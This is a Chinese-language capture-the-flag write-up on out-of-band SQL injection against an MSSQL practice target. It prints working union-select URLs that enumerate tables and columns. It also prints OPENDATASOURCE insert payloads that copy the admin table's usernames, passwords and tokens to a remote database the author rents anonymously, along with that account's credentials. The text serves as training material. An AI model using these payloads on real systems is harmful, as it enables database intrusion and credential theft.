工具:香港云免费云服务器:http://www.webweb.com
注册使用匿名邮箱:https://bccto.me/
香港云服务器搭建MSSQL数据库,并建表admin,字段数要大于等于我们想要获取的表。
首先打开靶场:http://59.63.200.79:8015/?id=1
尝试是否可注入:
闭合;
通过order by查询到表中为三字段。后来通过问别人知道里面还有一字段类型是二进制大对象 不支持order by——-所以说是四个字段,建表时尽可能多建吧。
先按照视频上讲的对靶场数据库进行表名,字段名查询常规操作,便于理解,但是实际反弹注入中可能不会出现:
查表名:http://59.63.200.79:8015/?id=1%27%20union%20select%20id,name,null%20from%20sysobjects%20where%20xtype=%27U%27--+
查到各表名及其在sysobjects系统自带表中的id。
查admin表中字段名:http://59.63.200.79:8015/?id=1%27%20union%20select%20id,name,null%20from%20syscolumns%20where%20id=1977058079%20--+
查表中内容:
查出了id、passwd、token。其中token可能就是flag.
接下来尝试反弹注入:
注册香港云:
账号:saddadsadadsa
香港运登录密码:12345678
数据库库名:DB_14B8A3E_AAAA
数据库密码:12345678
数据库链接地址:SQL5006.webweb.com
数据库用户名:DB_14B8A3E_AAAA_admin
在香港云的数据库中创建一个大于三字段的表,用来接收数据。
我们创建了一个叫admin的四字段表用来接收反弹注入数据;
构建语句:insert
into
opendatasource(‘sqloledb’,’server=SQL5006.webweb.com,1433;uid=DB_14B8A3E_AAAA_admin;pwd=12345678;database=DB_14B8A3E_AAAA’).DB_14B8A3E_AAAA.dbo.admin
select * from admin —+
执行状况:
获得flag.当然这里数据只有一条,实战中应该结合系统自代表一步步查询。
insert
into
opendatasource(‘sqloledb’,’server=SQL5006.webweb.com,1433;uid=DB_14B8A3E_AAAA_admin;pwd=12345678;database=DB_14B8A3E_AAAA’).DB_14B8A3E_AAAA.dbo.admin
select null,null,name,null from sysobjects where xtype=’U’ —+
查询出所有用户创建表:
获得表的id。
查询admin表中字段:insert
into
opendatasource(‘sqloledb’,’server=SQL5006.webweb.com,1433;uid=DB_14B8A3E_AAAA_admin;pwd=12345678;database=DB_14B8A3E_AAAA’).DB_14B8A3E_AAAA.dbo.admin
select * from syscolumns where id=1977058079 —+
获得字段.
获得表中数据:insert
into
opendatasource(‘sqloledb’,’server=SQL5006.webweb.com,1433;uid=DB_14B8A3E_AAAA_admin;pwd=12345678;database=DB_14B8A3E_AAAA’).DB_14B8A3E_AAAA.dbo.admin
select%20 id,passwd,token,username from admin —+
获得flag.